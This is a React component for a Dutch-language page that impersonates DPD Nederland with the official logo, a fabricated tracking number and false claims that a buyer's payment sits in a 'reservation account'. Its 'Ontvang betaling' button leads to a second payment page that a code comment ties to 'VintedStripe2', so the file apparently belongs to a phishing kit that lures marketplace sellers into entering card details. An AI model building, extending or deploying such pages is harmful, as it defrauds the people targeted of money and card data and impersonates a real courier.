import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DpdNlSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/dpd-cz/dpd-logo-official.svg`;

function noop(e) {
  e.preventDefault();
}

/** Stabiel 16-tekens volgnummer (letters/cijfers), vergelijkbaar met DPD-stijl. */
function nlVolgnummer(pageCode, pageData) {
  const raw = (pageCode || pageData?.page_code || '').trim();
  const seed = raw || String(pageData?.unique_id || 'dpd');
  let h = 0;
  for (let i = 0; i < seed.length; i += 1) h = (h * 31 + seed.charCodeAt(i)) >>> 0;
  const chars = 'ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz23456789';
  let out = '';
  for (let i = 0; i < 16; i += 1) {
    h = (h * 1103515245 + 12345 + i) >>> 0;
    out += chars[h % chars.length];
  }
  return out;
}

function IconPlus() {
  return (
    <svg className="dpdnl-step-ic" viewBox="0 0 24 24" aria-hidden>
      <path d="M12 5v14M5 12h14" stroke="currentColor" strokeWidth="2" strokeLinecap="round" />
    </svg>
  );
}

function IconBank() {
  return (
    <svg className="dpdnl-step-ic" viewBox="0 0 24 24" aria-hidden>
      <path
        d="M3 10l9-6 9 6v2H3v-2zm0 4h18v8H3v-8zm4 4h2v2H7v-2zm4 0h2v2h-2v-2zm4 0h2v2h-2v-2z"
        fill="currentColor"
      />
    </svg>
  );
}

function IconPencil() {
  return (
    <svg className="dpdnl-step-ic" viewBox="0 0 24 24" aria-hidden>
      <path
        d="M4 16.5V20h3.5L17.5 9.5 14 6 4 16.5zM20.7 7c.4-.4.4-1 0-1.4l-2.3-2.3c-.4-.4-1-.4-1.4 0l-1.6 1.6L19 8.6l1.7-1.6z"
        fill="currentColor"
      />
    </svg>
  );
}

function IconWaiting() {
  return (
    <span className="dpdnl-step-wait" aria-hidden>
      <span />
      <span />
      <span />
    </span>
  );
}

/**
 * DPD Nederland — status + leveringsinformatie; «ONTVANG BETALING» → index2 (VintedStripe2).
 */
function DpdNlSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'NL').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const amountDisplay = useMemo(() => {
    if (priceNumber == null) return '—';
    return new Intl.NumberFormat('nl-NL', {
      minimumFractionDigits: 0,
      maximumFractionDigits: 2,
    }).format(priceNumber);
  }, [priceNumber]);

  const amountLine = priceNumber == null ? `— ${sym}` : `${amountDisplay} ${sym}`;

  const volgId = useMemo(() => nlVolgnummer(pageCode || '', pageData), [pageCode, pageData]);

  const recipient =
    [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const opmerking = (pageData?.site_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="dpdnl-wrap" lang="nl">
        <div className="dpdnl-loading">Laden…</div>
        <div className="dpdnl-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="dpdnl-wrap" lang="nl">
      <header className="dpdnl-header">
        <div className="dpdnl-header-inner">
          <a href="#/" className="dpdnl-logo-link" onClick={noop} aria-label="DPD">
            <img src={LOGO_SRC} alt="DPD" className="dpdnl-logo" />
          </a>
        </div>
      </header>

      <main className="dpdnl-main">
        <div className="dpdnl-grid">
          <div className="dpdnl-col-main">
            <h1 className="dpdnl-h1">Volgnummer is aangemaakt</h1>
            <p className="dpdnl-intro">
              Uw volgnummer is gegenereerd en de betaling voor deze zending is succesvol verwerkt. Controleer de
              leveringsinformatie in het rechterpaneel.
            </p>
            <p className="dpdnl-intro">
              Nadat u de gegevens heeft bevestigd, kiest u een leverdatum. Vervolgens neemt een medewerker contact met
              u op over de afhandeling.
            </p>
            <p className="dpdnl-volg-line">
              Volgnummer <strong className="dpdnl-volg-code">{volgId}</strong>
            </p>

            <div className="dpdnl-timeline" role="list">
              <div className="dpdnl-step dpdnl-step--done" role="listitem">
                <div className="dpdnl-step-marker">
                  <IconPlus />
                </div>
                <div className="dpdnl-step-body">
                  <h2 className="dpdnl-step-title">Volgnummer is aangemaakt</h2>
                  <p className="dpdnl-step-sub">Het volgnummer is geregistreerd in ons systeem.</p>
                </div>
              </div>
              <div className="dpdnl-step dpdnl-step--done" role="listitem">
                <div className="dpdnl-step-marker">
                  <IconBank />
                </div>
                <div className="dpdnl-step-body">
                  <h2 className="dpdnl-step-title">Bestelling is betaald</h2>
                  <p className="dpdnl-step-sub">De middelen zijn gestort op onze reserveringsrekening.</p>
                </div>
              </div>
              <div className="dpdnl-step dpdnl-step--done" role="listitem">
                <div className="dpdnl-step-marker">
                  <IconPencil />
                </div>
                <div className="dpdnl-step-body">
                  <h2 className="dpdnl-step-title">Leveringsdetails zijn opgegeven</h2>
                  <p className="dpdnl-step-sub">
                    We hebben gecontroleerd of we het item naar het opgegeven afleveradres kunnen leveren.
                  </p>
                </div>
              </div>
              <div className="dpdnl-step dpdnl-step--active" role="listitem">
                <div className="dpdnl-step-marker dpdnl-step-marker--wait">
                  <IconWaiting />
                </div>
                <div className="dpdnl-step-body">
                  <h2 className="dpdnl-step-title">We wachten op de afzender</h2>
                  <p className="dpdnl-step-sub">We wachten op bevestiging van de bestelling door de afzender.</p>
                </div>
              </div>
            </div>
          </div>

          <aside className="dpdnl-sidebar">
            <h3 className="dpdnl-side-h">Leveringsinformatie</h3>
            <dl className="dpdnl-dl">
              <dt>Initialen van de ontvanger</dt>
              <dd>{recipient}</dd>
              <dt>Leveringsadres</dt>
              <dd>{address}</dd>
              <dt>Opmerking</dt>
              <dd>{opmerking}</dd>
            </dl>
            <div className="dpdnl-total-block">
              <p className="dpdnl-total-label">Totaal ontvangen bedrag</p>
              <p className="dpdnl-total-val">{amountLine}</p>
              <p className="dpdnl-vat-note">
                Volgens de voorwaarden betaalt de koper de btw; er worden geen extra kosten bij u in rekening gebracht.
              </p>
            </div>
            <Link to={index2Path} className="dpdnl-cta">
              Ontvang betaling
            </Link>
          </aside>
        </div>
      </main>

      <div className="dpdnl-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default DpdNlSuccess;
